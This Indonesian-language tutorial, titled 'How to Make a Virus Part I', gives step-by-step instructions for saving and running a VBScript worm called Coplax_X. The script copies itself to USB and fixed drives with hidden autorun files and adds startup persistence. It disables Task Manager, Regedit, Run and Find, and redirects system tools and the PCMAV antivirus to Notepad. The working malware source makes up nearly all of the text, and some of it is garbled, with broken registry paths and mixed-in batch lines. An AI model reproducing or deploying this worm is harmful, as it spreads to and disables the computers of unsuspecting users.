Cara Membuat Virus Bagian I

Cara Membuat Virus

Kesalahan Ditanggung Sendiri

1. Buka Notepad

2. Copy ato Tulis skrip di bawah ini

‘Coplax_X

‘Varian dari coplax.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,coplax,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe coplaxms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “coplaxx.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “coplax_x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “coplax_x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”coplaxms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”coplaxms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”coplaxms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,”:: ->COPLAX_X<- ::” ‘File Hidden tak terlihat coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”,2, “REG_DWORD” ‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1″, “REG_DWORD” coplax.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1″, “REG_DWORD” ‘Buat pesan saat Windows Startup coplax.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “THE COPLAX_X”

coplax.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText”,”No reason for Panic”

‘Ubah nama Pengguna dan Nama Perusahaan Pembuat

echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "COPLAX", "REG_SZ">>c:\windows\aaaa.vbs
echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "COPLAX Corp.", "REG_SZ">>c:\windows\aaaa.vbs

‘Aktifkan saat Windows Startup

coplax.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- coplax.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exeDebugger”,”notepad.exe”
coplax.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exeDebugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama coplax32.dll.vbs.